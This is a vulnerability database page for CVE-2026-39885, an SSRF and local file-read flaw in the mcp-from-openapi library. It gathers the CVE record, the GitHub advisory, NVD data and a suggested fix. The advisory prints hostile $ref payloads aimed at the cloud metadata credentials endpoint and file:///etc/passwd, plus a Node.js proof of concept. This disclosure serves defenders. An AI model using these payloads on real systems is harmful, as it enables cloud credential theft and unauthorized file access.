Vulnerability-Lookup

CVE-2026-39885 (GCVE-0-2026-39885)

Vulnerability from cvelistv5 – Published: 2026-04-08 20:34 – Updated: 2026-04-09 16:16

Title

FrontMCP Affected by SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications

Summary

FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 2.3.0, the mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications. This vulnerability is fixed in 2.3.0.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/agentfront/frontmcp/security/a…	x_refsource_CONFIRM
	https://github.com/agentfront/frontmcp/releases/t…	x_refsource_MISC

Impacted products

Vendor

Product

Version

agentfront

frontmcp

Affected: < 1.0.4

@frontmcp	adapters	Affected: < 1.0.4
@frontmcp	sdk	Affected: < 1.0.4
frontmcp	mcp-from-openapi	Affected: < 2.3.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-39885",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-09T14:53:12.471902Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-09T16:16:59.067Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "frontmcp",
          "vendor": "agentfront",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.4"
            }
          ]
        },
        {
          "product": "adapters",
          "vendor": "@frontmcp",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.4"
            }
          ]
        },
        {
          "product": "sdk",
          "vendor": "@frontmcp",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.0.4"
            }
          ]
        },
        {
          "product": "mcp-from-openapi",
          "vendor": "frontmcp",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c  2.3.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 2.3.0, the mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications. This vulnerability is fixed in 2.3.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-08T20:34:20.538Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
        },
        {
          "name": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4"
        }
      ],
      "source": {
        "advisory": "GHSA-v6ph-xcq9-qxxj",
        "discovery": "UNKNOWN"
      },
      "title": "FrontMCP Affected by SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-39885",
    "datePublished": "2026-04-08T20:34:20.538Z",
    "dateReserved": "2026-04-07T20:32:03.010Z",
    "dateUpdated": "2026-04-09T16:16:59.067Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-39885",
      "date": "2026-04-14",
      "epss": "0.00042",
      "percentile": "0.12471"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-39885\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-08T21:17:00.833\",\"lastModified\":\"2026-04-09T17:16:29.533\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 2.3.0, the mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications. This vulnerability is fixed in 2.3.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/agentfront/frontmcp/releases/tag/v1.0.4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-39885\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-09T14:53:12.471902Z\"}}}], \"references\": [{\"url\": \"https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-09T14:53:28.220Z\"}}], \"cna\": {\"title\": \"FrontMCP Affected by SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications\", \"source\": {\"advisory\": \"GHSA-v6ph-xcq9-qxxj\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"agentfront\", \"product\": \"frontmcp\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.0.4\"}]}, {\"vendor\": \"@frontmcp\", \"product\": \"adapters\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.0.4\"}]}, {\"vendor\": \"@frontmcp\", \"product\": \"sdk\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.0.4\"}]}, {\"vendor\": \"frontmcp\", \"product\": \"mcp-from-openapi\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c  2.3.0\"}]}], \"references\": [{\"url\": \"https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj\", \"name\": \"https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/agentfront/frontmcp/releases/tag/v1.0.4\", \"name\": \"https://github.com/agentfront/frontmcp/releases/tag/v1.0.4\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 2.3.0, the mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications. This vulnerability is fixed in 2.3.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-08T20:34:20.538Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-39885\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-09T16:16:59.067Z\", \"dateReserved\": \"2026-04-07T20:32:03.010Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-08T20:34:20.538Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-V6PH-XCQ9-QXXJ

Vulnerability from github – Published: 2026-04-08 19:22 – Updated: 2026-04-09 14:29

Summary

mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications

Details

Summary

The mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.

Affected Versions

<= 2.1.2 (latest)

CWE

CWE-918: Server-Side Request Forgery (SSRF)

Vulnerability Details

File: index.js lines 870-875

When OpenAPIToolGenerator.initialize() is called, it dereferences the OpenAPI document using json-schema-ref-parser:

this.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(
  JSON.parse(JSON.stringify(this.document))
);

No options are passed to .dereference() — no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in $ref values, including:

http:// and https:// URLs (internal services, cloud metadata)
file:// URLs (local filesystem)

This is the default behavior of json-schema-ref-parser — it resolves all $ref pointers by fetching the referenced resource.

Exploitation

Attack 1: SSRF to internal services / cloud metadata

A malicious OpenAPI spec containing:

{
  "openapi": "3.0.0",
  "info": { "title": "Evil API", "version": "1.0" },
  "paths": {
    "/test": {
      "get": {
        "operationId": "getTest",
        "summary": "test",
        "responses": {
          "200": {
            "description": "OK",
            "content": {
              "application/json": {
                "schema": {
                  "$ref": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
                }
              }
            }
          }
        }
      }
    }
  }
}

When processed by OpenAPIToolGenerator, the library fetches http://169.254.169.254/latest/meta-data/iam/security-credentials/ from the server, potentially leaking AWS IAM credentials.

Attack 2: Local file read

{
  "$ref": "file:///etc/passwd"
}

The ref parser reads local files and includes their contents in the dereferenced output.

Proof of Concept

const http = require('http');
const { OpenAPIToolGenerator } = require('mcp-from-openapi');

// Start attacker server to prove SSRF
const srv = http.createServer((req, res) => {
    console.log(`SSRF HIT: ${req.method} ${req.url}`);
    res.writeHead(200, {'Content-Type': 'application/json'});
    res.end('{"type":"string"}');
});

srv.listen(9997, async () => {
    const spec = {
        openapi: '3.0.0',
        info: { title: 'Evil', version: '1.0' },
        paths: {
            '/test': {
                get: {
                    operationId: 'getTest',
                    summary: 'test',
                    responses: {
                        '200': {
                            description: 'OK',
                            content: {
                                'application/json': {
                                    schema: { '$ref': 'http://127.0.0.1:9997/ssrf-proof' }
                                }
                            }
                        }
                    }
                }
            }
        }
    };

    const gen = new OpenAPIToolGenerator(spec, { validate: false });
    await gen.initialize();
    // Output: "SSRF HIT: GET /ssrf-proof"
    // The library fetched our attacker URL during $ref dereferencing.

    srv.close();
});

Tested and confirmed on mcp-from-openapi v2.1.2. The attacker server receives the GET request during initialize().

Impact

Cloud credential theft — $ref pointing to http://169.254.169.254/ steals AWS/GCP/Azure metadata
Internal network scanning — $ref values can probe internal services and ports
Local file read — file:// protocol reads arbitrary files from the server filesystem
No privileges required — attacker only needs to provide a crafted OpenAPI spec to any application using this library

Suggested Fix

Pass resolver options to dereference() that restrict which protocols and hosts are allowed:

this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: {
      file: false,        // Disable file:// protocol
      http: {
        // Only allow same-origin or explicitly allowed hosts
        headers: this.options.headers,
        timeout: this.options.timeout,
      }
    }
  }
);

Or disable all external resolution and require all schemas to be inline:

this.dereferencedDocument = await $RefParser.dereference(
  JSON.parse(JSON.stringify(this.document)),
  {
    resolve: { file: false, http: false, https: false }
  }
);

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.1.2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "mcp-from-openapi"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@frontmcp/sdk"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.0.3"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@frontmcp/adapters"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39885"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T19:22:53Z",
    "nvd_published_at": "2026-04-08T21:17:00Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nThe `mcp-from-openapi` library uses `@apidevtools/json-schema-ref-parser` to dereference `$ref` pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing `$ref` values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the `initialize()` call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications.\n\n\n## Affected Versions\n\n`\u003c= 2.1.2` (latest)\n\n## CWE\n\nCWE-918: Server-Side Request Forgery (SSRF)\n\n## Vulnerability Details\n\n**File:** `index.js` lines 870-875\n\nWhen `OpenAPIToolGenerator.initialize()` is called, it dereferences the OpenAPI document using `json-schema-ref-parser`:\n\n```javascript\nthis.dereferencedDocument = await import_json_schema_ref_parser.default.dereference(\n  JSON.parse(JSON.stringify(this.document))\n);\n```\n\nNo options are passed to `.dereference()` \u2014 no URL allowlist, no custom resolvers, no protocol restrictions. The ref parser fetches any URL it encounters in `$ref` values, including:\n\n- `http://` and `https://` URLs (internal services, cloud metadata)\n- `file://` URLs (local filesystem)\n\nThis is the default behavior of `json-schema-ref-parser` \u2014 it resolves all `$ref` pointers by fetching the referenced resource.\n\n## Exploitation\n\n### Attack 1: SSRF to internal services / cloud metadata\n\nA malicious OpenAPI spec containing:\n\n```json\n{\n  \"openapi\": \"3.0.0\",\n  \"info\": { \"title\": \"Evil API\", \"version\": \"1.0\" },\n  \"paths\": {\n    \"/test\": {\n      \"get\": {\n        \"operationId\": \"getTest\",\n        \"summary\": \"test\",\n        \"responses\": {\n          \"200\": {\n            \"description\": \"OK\",\n            \"content\": {\n              \"application/json\": {\n                \"schema\": {\n                  \"$ref\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"\n                }\n              }\n            }\n          }\n        }\n      }\n    }\n  }\n}\n```\n\nWhen processed by `OpenAPIToolGenerator`, the library fetches `http://169.254.169.254/latest/meta-data/iam/security-credentials/` from the server, potentially leaking AWS IAM credentials.\n\n### Attack 2: Local file read\n\n```json\n{\n  \"$ref\": \"file:///etc/passwd\"\n}\n```\n\nThe ref parser reads local files and includes their contents in the dereferenced output.\n\n## Proof of Concept\n\n```javascript\nconst http = require(\u0027http\u0027);\nconst { OpenAPIToolGenerator } = require(\u0027mcp-from-openapi\u0027);\n\n// Start attacker server to prove SSRF\nconst srv = http.createServer((req, res) =\u003e {\n    console.log(`SSRF HIT: ${req.method} ${req.url}`);\n    res.writeHead(200, {\u0027Content-Type\u0027: \u0027application/json\u0027});\n    res.end(\u0027{\"type\":\"string\"}\u0027);\n});\n\nsrv.listen(9997, async () =\u003e {\n    const spec = {\n        openapi: \u00273.0.0\u0027,\n        info: { title: \u0027Evil\u0027, version: \u00271.0\u0027 },\n        paths: {\n            \u0027/test\u0027: {\n                get: {\n                    operationId: \u0027getTest\u0027,\n                    summary: \u0027test\u0027,\n                    responses: {\n                        \u0027200\u0027: {\n                            description: \u0027OK\u0027,\n                            content: {\n                                \u0027application/json\u0027: {\n                                    schema: { \u0027$ref\u0027: \u0027http://127.0.0.1:9997/ssrf-proof\u0027 }\n                                }\n                            }\n                        }\n                    }\n                }\n            }\n        }\n    };\n\n    const gen = new OpenAPIToolGenerator(spec, { validate: false });\n    await gen.initialize();\n    // Output: \"SSRF HIT: GET /ssrf-proof\"\n    // The library fetched our attacker URL during $ref dereferencing.\n\n    srv.close();\n});\n```\n\n**Tested and confirmed** on mcp-from-openapi v2.1.2. The attacker server receives the GET request during `initialize()`.\n\n## Impact\n\n- **Cloud credential theft** \u2014 `$ref` pointing to `http://169.254.169.254/` steals AWS/GCP/Azure metadata\n- **Internal network scanning** \u2014 `$ref` values can probe internal services and ports\n- **Local file read** \u2014 `file://` protocol reads arbitrary files from the server filesystem\n- **No privileges required** \u2014 attacker only needs to provide a crafted OpenAPI spec to any application using this library\n\n## Suggested Fix\n\nPass resolver options to `dereference()` that restrict which protocols and hosts are allowed:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n  JSON.parse(JSON.stringify(this.document)),\n  {\n    resolve: {\n      file: false,        // Disable file:// protocol\n      http: {\n        // Only allow same-origin or explicitly allowed hosts\n        headers: this.options.headers,\n        timeout: this.options.timeout,\n      }\n    }\n  }\n);\n```\n\nOr disable all external resolution and require all schemas to be inline:\n\n```javascript\nthis.dereferencedDocument = await $RefParser.dereference(\n  JSON.parse(JSON.stringify(this.document)),\n  {\n    resolve: { file: false, http: false, https: false }\n  }\n);\n```",
  "id": "GHSA-v6ph-xcq9-qxxj",
  "modified": "2026-04-09T14:29:54Z",
  "published": "2026-04-08T19:22:53Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39885"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/agentfront/frontmcp"
    },
    {
      "type": "WEB",
      "url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "mcp-from-openapi is Vulnerable to SSRF via $ref Dereferencing in Untrusted OpenAPI Specifications"
}

FKIE_CVE-2026-39885

Vulnerability from fkie_nvd - Published: 2026-04-08 21:17 - Updated: 2026-04-09 17:16

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/agentfront/frontmcp/releases/tag/v1.0.4
	security-advisories@github.com	https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "FrontMCP is a TypeScript-first framework for the Model Context Protocol (MCP). Prior to 2.3.0, the mcp-from-openapi library uses @apidevtools/json-schema-ref-parser to dereference $ref pointers in OpenAPI specifications without configuring any URL restrictions or custom resolvers. A malicious OpenAPI specification containing $ref values pointing to internal network addresses, cloud metadata endpoints, or local files will cause the library to fetch those resources during the initialize() call. This enables Server-Side Request Forgery (SSRF) and local file read attacks when processing untrusted OpenAPI specifications. This vulnerability is fixed in 2.3.0."
    }
  ],
  "id": "CVE-2026-39885",
  "lastModified": "2026-04-09T17:16:29.533",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-08T21:17:00.833",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/agentfront/frontmcp/releases/tag/v1.0.4"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/agentfront/frontmcp/security/advisories/GHSA-v6ph-xcq9-qxxj"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Undergoing Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-39885 (GCVE-0-2026-39885)

GHSA-V6PH-XCQ9-QXXJ

Summary

Affected Versions

CWE

Vulnerability Details

Exploitation

Attack 1: SSRF to internal services / cloud metadata

Attack 2: Local file read

Proof of Concept

Impact

Suggested Fix

FKIE_CVE-2026-39885

Tags

Sightings

Nomenclature